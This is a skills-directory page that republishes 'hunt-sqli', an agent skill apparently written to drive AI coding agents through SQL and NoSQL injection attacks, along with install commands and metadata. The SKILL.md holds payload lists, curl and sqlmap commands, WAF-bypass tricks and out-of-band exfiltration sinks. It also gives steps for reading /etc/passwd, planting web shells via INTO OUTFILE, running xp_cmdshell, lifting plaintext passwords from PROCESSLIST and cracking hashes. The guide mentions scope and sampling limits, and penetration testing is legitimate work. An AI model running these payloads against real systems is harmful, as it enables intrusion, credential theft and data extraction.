Trace Injection Dataflows
cyberful/cyberful
Trace and test untrusted data through SQL, NoSQL, LDAP, XPath, XML, shell, process, template, expression-language, code-evaluation, log, spreadsheet, mail, header, and browser interpreters.
SQLi and NoSQLi hunting - error-based, boolean-blind, time-based, UNION, NoSQL operator injection.
$ npx skills add Encod3d-Sec/TORCH --skill hunt-sqli -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install Encod3d-Sec/TORCH hunt-sqli --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/Encod3d-Sec/TORCH.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/hunt/hunt-sqli .claude/skills/hunt-sqli && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "hunt-sqli" agent skill from https://github.com/Encod3d-Sec/TORCH/tree/main/skills/hunt/hunt-sqli into .claude/skills/hunt-sqli/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-sqli", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/Encod3d-Sec/TORCH/tree/main/skills/hunt/hunt-sqliType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add Encod3d-Sec/TORCH --skill hunt-sqli -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install Encod3d-Sec/TORCH hunt-sqli --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/Encod3d-Sec/TORCH.git skills-src && mkdir -p .agents/skills && cp -r skills-src/skills/hunt/hunt-sqli .agents/skills/hunt-sqli && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "hunt-sqli" agent skill from https://github.com/Encod3d-Sec/TORCH/tree/main/skills/hunt/hunt-sqli into .agents/skills/hunt-sqli/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-sqli", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add Encod3d-Sec/TORCH --skill hunt-sqli -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install Encod3d-Sec/TORCH hunt-sqli --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/Encod3d-Sec/TORCH.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/skills/hunt/hunt-sqli .cursor/skills/hunt-sqli && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "hunt-sqli" agent skill from https://github.com/Encod3d-Sec/TORCH/tree/main/skills/hunt/hunt-sqli into .cursor/skills/hunt-sqli/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-sqli", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/Encod3d-Sec/TORCH.git --path skills/hunt/hunt-sqli--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add Encod3d-Sec/TORCH --skill hunt-sqli -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install Encod3d-Sec/TORCH hunt-sqli --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/Encod3d-Sec/TORCH.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/skills/hunt/hunt-sqli .gemini/skills/hunt-sqli && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "hunt-sqli" agent skill from https://github.com/Encod3d-Sec/TORCH/tree/main/skills/hunt/hunt-sqli into .gemini/skills/hunt-sqli/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-sqli", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install Encod3d-Sec/TORCH hunt-sqliInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add Encod3d-Sec/TORCH --skill hunt-sqli -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/Encod3d-Sec/TORCH.git skills-src && mkdir -p .github/skills && cp -r skills-src/skills/hunt/hunt-sqli .github/skills/hunt-sqli && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "hunt-sqli" agent skill from https://github.com/Encod3d-Sec/TORCH/tree/main/skills/hunt/hunt-sqli into .github/skills/hunt-sqli/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-sqli", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add Encod3d-Sec/TORCH --skill hunt-sqli -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install Encod3d-Sec/TORCH hunt-sqli --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/Encod3d-Sec/TORCH.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/skills/hunt/hunt-sqli .opencode/skills/hunt-sqli && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "hunt-sqli" agent skill from https://github.com/Encod3d-Sec/TORCH/tree/main/skills/hunt/hunt-sqli into .opencode/skills/hunt-sqli/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "hunt-sqli", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
hunt-sqliSQLi and NoSQLi hunting - error-based, boolean-blind, time-based, UNION, NoSQL operator injection.
Hunt Sqli is an agent skill from Encod3d-Sec/TORCH. SQLi and NoSQLi hunting - error-based, boolean-blind, time-based, UNION, NoSQL operator injection. sqlmap automation after manual confirmation. Wiki-first, FIND schema output.
Its SKILL.md is about 3.4k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.
It sits in Databases, covering NoSQL databases. The repository describes itself as: Karpathy LLM based claude harness for PenetrationTesting / Bugbounty using obsidian. The licence is MIT.
8 steps, taken from the first numbered list in SKILL.md.
Read from SKILL.md and the folder at commit d21b6c9. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Shell commands in SKILL.md call:
curlpython3From the folder's file list and the shell code blocks in SKILL.md.
No URLs in SKILL.md. Its commands use curl, which can reach the network depending on how they are called.
From URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Hunt Sqli loads about 3.4k tokens when it runs. Until then it costs about 46 tokens; SKILL.md has 1,668 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found no risky patterns in SKILL.md.
Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from Encod3d-Sec/TORCH at commit d21b6c9, republished under its MIT licence (© Encod3d-Sec). 1,668 words, ~3,381 tokens.
.claude/skills/hunt-sqli/SKILL.md (or your agent's skills folder).Assumes hunt-core for the scope gate, two-account rule, confirmation gate, enumeration limits, stop conditions, wiki protocol, FIND output, and Deadends. Do not re-derive any of that here.
qmd_query "SQL injection SQLi NoSQL union boolean-blind time-based error-based" via wiki-search MCPHub: [[web-moc]] (live web index). Primary page: [[sql-injection]]. Payload arsenal: wiki/payloads/sqli.md.
Anchors: [[nosql-injection]], [[orm-injection]].
NOT confirmation: a generic 500; a WAF block page or a "SQL injection detected" string (that is the app's filter firing, not the database); a reflected error string you have not proved originates from the DB; a single non-repeatable slow response; a boolean or time inference with no differential (no clean baseline-vs-injected delta); the payload echoed back from your own request; any verdict read off a response body without a clean-session re-verify.
IS confirmation: a DB error whose text is demonstrably from the engine (extractvalue/updatexml output, a driver error naming the DBMS); UNION or error-based output that returns real DB content; a boolean oracle that flips TRUE/FALSE consistently across probes; a time delta that reproduces on repeat (baseline vs SLEEP(5)/pg_sleep(5)/WAITFOR, re-run); or an out-of-band DNS/HTTP hit to your unique Collaborator/interactsh subdomain. Re-verify in a CLEAN session every time; on a login-redirect oracle clear the session cookie between probes (a stale authenticated session reads as always-true).
Out-of-band (blind SQLi via DNS/HTTP). When you plant a blind/OOB payload, append a row to targets/<eng>/oob.md: | <token> | <sink url+param> | sqli | <date> | waiting | | (columns: token | sink | class | planted | status | source, token = your unique Collaborator/interactsh label). Exfil sinks: MySQL LOAD_FILE/UNC path, MSSQL xp_dirtree, Oracle UTL_HTTP. The recon-capture hook auto-correlates the callback to flip the row to HIT and SessionStart surfaces HITs; a HIT row is the gate to scaffold the FIND. Do NOT claim a blind SQLi without a HIT row.
Highest-value injection points first:
?q=, ?category=, ?sort=&order= (ORDER BY injection), ?start_date=; user input lands straight in a WHERE/ORDER BY.{"$gt":""}, [$ne]).URL patterns:
/search?q= /filter?category= /sort?by=&order= /report?start_date=
/api/v1/items?id= /index.php?id= /gallery?album_id= ?page=&limit=Fingerprint the DB: PHP + Apache -> MySQL; Express + MongoDB -> NoSQL; application/json with nested objects -> potential NoSQL.
Order: in-band before blind. Try error-based and UNION (direct data/errors) BEFORE
boolean/time-based - blind is slow and easily masked (e.g. an anti-bruteforce SLEEP() on the
login page adds a constant delay that hides your injected SLEEP). UNION/error need a place
where query output or a DB error is REFLECTED; if the page you are hitting reflects nothing,
test the SQLi on a different page that does.
' " ` ') ")) and numeric/no-quote.
A ' doing nothing does NOT mean safe: the sink may be double-quoted (WHERE x="$v"). Watch
for a reflected DB error or any length change. On a numeric-looking id param, test the
NUMERIC context FIRST with a boolean pair - id=1 AND 1=1 (row shows) vs id=1 AND 1=2 (row
gone). That one request pair settles the context before you burn turns theorizing quote/LIKE
breakouts; a ' that only errors can be a WAF/troll page, not the real query shape.extractvalue/updatexml) and UNION (ORDER BY for col count,
then UNION SELECT). Mind display truncation when sizing extracted chunks.AND 1=1 vs AND 1=2) then time (SLEEP(5)/pg_sleep(5)/WAITFOR).{"$gt": ""} or param[$ne]=invalid.id=2-1 evaluates to row 1 = injection proven) - the NEXT step is sqlmap, never a
hand-rolled group_concat/LIMIT paging loop to extract the data yourself:# ONE confirming curl (baseline vs injected); then hand off to sqlmap, don't hand-loop probes
curl -o /dev/null -s -w "%{time_total}\n" "https://target.com/search?q=test' AND SLEEP(5)-- -"
# sqlmap owns the rest: DBMS fingerprint, WAF bypass, enumeration, extraction
sqlmap -u "https://target.com/search?q=test" --level=3 --risk=2 --batch --dbsKeep exactly ONE manual curl in the writeup as the confirming PoC; sqlmap owns enumeration.
Anti-automation signal -> do NOT run sqlmap at all (stay manual + serial). A taunt string
("try sqlmap", "I dare you"), a request-rate-limiter / lockout, a char-blacklist WAF, or
intermittent empty/ban responses after a burst = the box is BUILT to defeat sqlmap. Its detection
burst just trips the limiter, and every response after that measures the ban, not the app (easily
misread as "server load / worker starvation"). Injection is already manually confirmed, so sqlmap
adds nothing here: extract by hand, ONE serial request at a time. Bypass the char blacklist with
functions + hex literals (database(), 0x7573657273 for a blocked table/column name) instead of
quotes/comments, and put the data in a column that reflects.
Rate-sensitive / fragile / worker-starving target -> sqlmap's detection burst trips HTTP 000.
Run it gentle: --delay 2 --timeout 40. Since injection was already manually confirmed, let sqlmap
resume from its own session (same output dir/target) instead of restarting - it skips
re-detection and goes straight to a fast UNION dump rather than re-probing the whole boundary.
Scope sqlmap to PROVING the vuln, not mass-exfiltrating records. An automated table dump is
data extraction and falls under the hunt-core enumeration limits: confirm + fingerprint + a
bounded sample (--dump with --start 1 --stop 5), never --dump-all. Sample of 5, ceiling 20
with operator approval, 0 under no_bruteforce.
9. Escalate impact (scoped to proof, not mass extraction): UNION extraction, INFORMATION_SCHEMA
for schema shape, file read/write if perms allow. See Chaining below.
10. Document: Burp Repeater screenshot + sqlmap output + a non-sensitive data sample. Push the
confirming request into Burp Repeater (Skill(hunt-burp) / capture.sh burp) so the
operator can replay it; use Collaborator for the OOB payloads above.
Distill when confirmed - reusable NoSQL/ORM bypass, GENERIC, no client host:
python3 scripts/wiki-stage.py --kind technique --slug <slug> --target-page techniques/web/sql-injection.md
-- Error probes
' '' ` ') ")) ' OR '1'='1 admin'--
-- Time-based (MySQL)
' AND SLEEP(5)--
-- Time-based (MSSQL)
'; WAITFOR DELAY '0:0:5'--
-- UNION (find column count first)
' ORDER BY 1-- ' ORDER BY 10--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,database(),3--
-- NoSQL (MongoDB JSON body)
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}}
-- NoSQL (query string)
username[$ne]=invalid&password[$ne]=invalidOnce you have a working injection, escalate along these edges (keep extraction scoped to proof):
LOAD_FILE('/etc/passwd'), MSSQL OPENROWSET, Oracle UTL_FILE; the OOB
DNS-exfil sinks above double as blind file read.INTO OUTFILE/DUMPFILE a web-shell into the docroot; MSSQL
xp_cmdshell; Postgres COPY ... TO PROGRAM; stacked queries where the driver allows them.
Hand off to hunt-rce once you have command execution.hunt-auth for the ATO.A WAF block or a "SQL injection detected" string is NOT "closed" - it is a filter to map and
bypass, not a fix. Vary the payload: inline comments (/**/, -- - vs #), case (SeLeCt),
encoding (URL/double-URL/hex, but note some filters block 0x), whitespace alternatives, AND
logic instead of OR, CASE WHEN instead of IF. The keyword-filter / login-redirect-oracle
section below is the worked example.
When the app hashes the password inside the SQL (... AND pass=md5("PLAINTEXT")) the plaintext
sits in the live query. If a bot/admin logs in periodically (often held a few seconds by an
anti-bruteforce SLEEP()), read it via the SQLi - the app connects as the same DB user, so you
see its threads even without global PROCESS priv:
" UNION SELECT 1,SUBSTRING((SELECT info FROM information_schema.PROCESSLIST
WHERE id=(SELECT MIN(id) FROM information_schema.PROCESSLIST)),POS,16)-- - -- POS=1,17,33,...INFO is non-NULL only while running -> poll fast, timed to the bot. Output truncates to the
sink's display width -> register one second-order account per N-char window, log each in, hammer
the rendering page with all sessions during the bot's window, concatenate the blocks. Recovered
creds are often reused for SSH, not the web login. Full writeup: [[sql-injection]].
hashcat -m 0 h /usr/share/wordlists/rockyou.txt -r best64, then john.0e... MD5 is only a magic hash for
PHP == if EVERY char after 0e is a digit.App rolls its own preg_match blacklist (returns a fixed "SQL Injection detected" string). Map it
one token at a time, then bypass: AND logic not OR, -- - not /**/, quoted literals not 0x
hex, CASE WHEN not IFNULL. If the post-login page is static, the login redirect is the
oracle: user' AND 1=1-- - -> 302 (TRUE), AND 1=2 -> 200 (FALSE). sqlmap usually FAILS here
(hex-encodes data as 0x -> blocked; follows the 302 -> diff confusion), so hand-roll a boolean
extractor and clear the session cookie every probe (a login oracle otherwise stays
authenticated -> always-true). Don't name the script enum.py (shadows stdlib). See [[sql-injection]].
Confirmed = data extracted, a DB-sourced error/UNION reflection, a consistent boolean oracle, a reproducible time delta on repeat, or an OOB HIT.
| Demonstrated | Typical |
|---|---|
Full DB dump, or RCE via xp_cmdshell / INTO OUTFILE web-shell | critical |
| Arbitrary data extraction (auth bypass, cross-table read, credentials) | high |
| Blind boolean/time-based only, no data pulled | medium |
Rate on demonstrated impact per hunt-core, not the theoretical maximum.
Append: - [ ] SQLi on <host> param <x> -- all probes 200/same-length, no time delta or DB error;
tried quote contexts / UNION / boolean / time / OOB, WAF filter mapped and bypassedRecord what you tried, not just that it failed. The next pass needs to know the boundary.
© Encod3d-Sec, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in skills/hunt/hunt-sqli of Encod3d-Sec/TORCH.
Open the folder on GitHubat commit d21b6c9
Hunt Sqli next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Hunt Sqli this skillEncod3d-Sec/TORCH | 329 | — | ~3.4k | Automated safety check: Pass | MIT | |
| Trace Injection Dataflowscyberful/cyberful | 135 | — | ~1.1k | Automated safety check: Pass | AGPL-3.0 | |
| Azure Storagemicrosoft/GitHub-Copilot-for-Azure | 255 | 2 repos | ~1.3k | Automated safety check: Pass | MIT | |
| Mongodb Connectionmongodb/agent-skills | 189 | 1 repos | ~3.5k | Automated safety check: Pass | Apache-2.0 | |
| Mongodb BackupsTheDecipherist/claude-code-mastery-project-starter-kit | 338 | — | ~1.3k | Automated safety check: Pass | MIT | |
| Mongodb Replica SetsTheDecipherist/claude-code-mastery-project-starter-kit | 338 | — | ~1.6k | Automated safety check: Pass | MIT |
cyberful/cyberful
Trace and test untrusted data through SQL, NoSQL, LDAP, XPath, XML, shell, process, template, expression-language, code-evaluation, log, spreadsheet, mail, header, and browser interpreters.
microsoft/GitHub-Copilot-for-Azure
Azure Storage Services including Blob Storage, File Shares, Queue Storage, Table Storage, and Data Lake.
mongodb/agent-skills
Optimize MongoDB client connection configuration (pools, timeouts, patterns) for any supported driver language.
TheDecipherist/claude-code-mastery-project-starter-kit
Production MongoDB backup and restore practices that the documentation gets wrong.
TheDecipherist/claude-code-mastery-project-starter-kit
Production MongoDB replica-set operation: topology, durability, host tuning, and the container-specific gotchas Claude gets wrong.
abpframework/abp
ABP reusable Module solution template - EF Core + MongoDB dual support, virtual methods for extensibility, DbTablePrefix, module options pattern, entity extension, separate connection string.
Encod3d-Sec/TORCH
Runs a bug-bounty engagement through a script that tracks the current pass, builds a board of rows from recon and prints the next required action each turn.
Encod3d-Sec/TORCH
Checks that the bb, pt and ctf workflow driver is set up correctly on a machine: vault content, skill symlinks, hooks, imports and a live smoke test, with fixes for failures.
Encod3d-Sec/TORCH
Opens a visible Chromium window on a Kali VM so an operator can complete a manual login or CAPTCHA while the agent watches and acts through the chrome-devtools MCP.
Encod3d-Sec/TORCH
Runs a capture-the-flag box from first scan to root with a driver script that tracks progress and prints the next action each turn.
Encod3d-Sec/TORCH
Decides when a main pentesting agent should hand a fully-specified, mechanical exploit-compile or privilege-escalation step to a cheaper sub-agent, and how to specify that handoff safely.
Encod3d-Sec/TORCH
Adaptive web fuzzing for pentests, bug bounty and CTF work: picks the smallest suitable SecLists wordlist per target surface and calibrates filters against soft-404 responses.
SQLi and NoSQLi hunting - error-based, boolean-blind, time-based, UNION, NoSQL operator injection. Hunt Sqli is an agent skill from Encod3d-Sec/TORCH. SQLi and NoSQLi hunting - error-based, boolean-blind, time-based, UNION, NoSQL operator injection.
Hunt Sqli fits situations like: tasks that involve NoSQL databases.
Run `npx skills add Encod3d-Sec/TORCH --skill hunt-sqli -a claude-code`. Or copy the skill folder (skills/hunt/hunt-sqli in Encod3d-Sec/TORCH) into .claude/skills/hunt-sqli in your project. Claude Code loads it when a task matches its description.
Run `npx skills add Encod3d-Sec/TORCH --skill hunt-sqli -a codex`. Or copy the skill folder (skills/hunt/hunt-sqli in Encod3d-Sec/TORCH) into .agents/skills/hunt-sqli in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add Encod3d-Sec/TORCH --skill hunt-sqli -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/hunt-sqli, .gemini/skills/hunt-sqli, .github/skills/hunt-sqli and .opencode/skills/hunt-sqli in your project.
Going by SKILL.md and its folder, Hunt Sqli needs the command-line tools its instructions call (curl and python3). Our summary lists: Python 3.
SKILL.md contains no URLs. Its commands use curl, which can reach the network depending on how they are called. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.
Hunt Sqli is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
About 3.4k tokens (SKILL.md is roughly 14k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Hunt Sqli: Trace Injection Dataflows (cyberful/cyberful, 135 stars), Azure Storage (microsoft/GitHub-Copilot-for-Azure, 255 stars), Mongodb Connection (mongodb/agent-skills, 189 stars) and Mongodb Backups (TheDecipherist/claude-code-mastery-project-starter-kit, 338 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
Encod3d-Sec (a GitHub user) maintains it in Encod3d-Sec/TORCH, which has 329 GitHub stars. The repository holds 35 skills in this directory. The repository was last updated on September 1, 2026.
Source: Encod3d-Sec/TORCH on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.